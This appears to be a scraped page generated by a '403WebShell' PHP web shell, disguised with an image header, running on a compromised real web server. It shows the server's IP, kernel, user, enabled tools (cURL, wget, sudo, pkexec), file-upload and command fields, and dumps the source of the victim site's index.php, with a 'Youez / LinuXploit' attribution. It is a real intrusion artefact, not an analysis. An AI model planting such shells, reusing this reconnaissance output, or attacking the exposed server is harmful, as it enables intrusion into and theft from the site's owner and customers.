????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.117.244.233
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/icad.astacus.se/archive/index.php
<?php 

session_start();
	if($_GET['page'] != "extern"){
	if( (($_SESSION['ASTACUS_SSO_INFO'])=='' )){
			header('location: http://icad.astacus.se/?page=loggain&message='.$status);
	}
	}
	include("language.php");

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>iCAD - CAD services via Internet</title>

<script type="text/javascript" src="http://download.skype.com/share/skypebuttons/js/skypeCheck.js"></script>
         <script type="text/javascript">
/* showClock() function extracts the current time hours, minutes and seconds and then displays them in the div with showText id from the BODY section */

function showClockSWE()
{
var clock=new Date( );
var hours=clock.getHours();
var minutes=clock.getMinutes();
var hours2=(clock.getHours() + 4) % 24;
var minutes2=(clock.getMinutes() + 30) % 60;
var seconds=clock.getSeconds();
// for a nice disply we'll add a zero before the numbers between 0 and 9
if (hours<10){
hours="0" + hours;
}
if (minutes<10){
minutes="0" + minutes;
}
if (seconds<10){
seconds="0" + seconds;
}

if (hours2<10){
hours2="0" + hours2;
}
if (minutes2<10){
minutes2="0" + minutes2;
}

document.getElementById('showTextSWE').innerHTML=hours+":"+minutes+":"+seconds;
document.getElementById('showTextIND').innerHTML=hours2+":"+minutes2+":"+seconds;
t=setTimeout('showClockSWE()',500);
/* setTimeout() JavaScript method is used to call showClock() every 1000 milliseconds (that means exactly 1 second) */
}


</script>          
<link href="../main.css" rel="stylesheet" type="text/css">
</head>

<body marginheight="0" topmargin="0" marginwidth="0" leftmargin="0" rightmargin="0">
<table width="100%"  border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td height="112" valign="top" background="../images/bottom_small.jpg"><table width="950" height="65" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td height="65"> <table width="950" border="0">
          <tr>
            <td width="750" align="left"><div align="left"></div>
                <table width="649" border="0" align="left" cellpadding="0" cellspacing="0">
                  <tr>
                    <td width="153" valign="middle">
                    <?php 
					if($_SESSION['ASTACUS_SSO_INFO'][4] == "1179"){
					?>
                     <img src="../images/sydtotal.jpg" width="94" height="39" align="absmiddle">
                   
                     <?php }else{ ?>
                     <img src="../images/icadloggo.gif" width="94" height="39" align="absmiddle"> <span class="heading2"> &nbsp;</span><span class="heading2white">Arkiv</span>
                     <?php }?>
                     
                    </td>
                    <td width="496"><table width="480" border="0" align="right" cellpadding="0" cellspacing="0">
                      <tr>
                        <td width="397" class="whitelink"><a href="../?page=loggain" class="whitelink"><?php echo($a101);?>, <?php echo($_SESSION['ASTACUS_SSO_INFO'][1]. " (".$_SESSION['ASTACUS_SSO_INFO'][2]);?>)</a><a href="../?page=icad" class="whitelink"><br>
                          
                        </a> <a href="#" class="whitelink">Kundnummer: <?php echo($_SESSION['ASTACUS_SSO_INFO'][4]);?></a></td>
                        <td width="64"><div align="right"><a href="../?page=loggaut&goto=archive" class="whitelink"><?php echo($a102);?></a></div></td>
                        <td width="4"><span class="text"></span></td>
                        <td width="15"><span class="text"></span></td>
                      </tr>
                    </table></td>
                  </tr>
              </table></td>
            <td width="52" align="left"><a href="../customerzon/?page=support"><img src="../images/support.png" width="30" height="30" border="0"></a></td>
            <td width="134" class="whitelink"><a href="../customerzon/?page=support" class="whitelink"><?php echo($a103);?> </a></td>
          </tr>
        </table></td>
        </tr>
    </table></td>
  </tr>
</table>
<?php
$page = $_GET['page']; 
if($page == "project"){
	include("project.php");
}else if($page == "rattigheter"){
	include("rattigheter.php");
}else if($page == "behorigheter"){
	include("behorigheter.php");
}else if($page == "download"){
	include("downloadfiles.php");
}else if($page == "installningar"){
	include("installningar.php");
}else if($page == "shared"){
	include("shared.php");
}else if($page == "upload"){
	include("upload.php");
}else if($page == "delochicad"){
	include("delochicad.php");
}else if($page == "filesshared"){
	include("sharedfiles.php");
}else if($page == "shareddownload"){
	include("shareddownload.php");
}else if($page == "support"){
	include("support.php");
}else if($page == "report"){
	include("report.php");
}else if($page == "parameters"){
	include("parameters.php");
}else if($page == "start_test"){
	include("start2.php");
}else if($page == "usersettings"){
	include("usersettings.php");
}else if($page == "dokument"){
	include("dokument.php");
	}else if($page == "extern"){
	include("start_extern.php");
}else if($page == "upload_documents"){
	include("upload_documents.php");
	
	
}else{



if($_SESSION['ASTACUS_SSO_INFO'][3] == 2 || $_SESSION['ASTACUS_SSO_INFO'][3] == 7 || $_SESSION['ASTACUS_SSO_INFO'][3] == 8 || $_SESSION['ASTACUS_SSO_INFO'][3] == 10){
	include("start_admin.php");
}else{
	include("start.php");
	
	}
	
}

mysql_close($link);
?>


<p>&nbsp;</p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit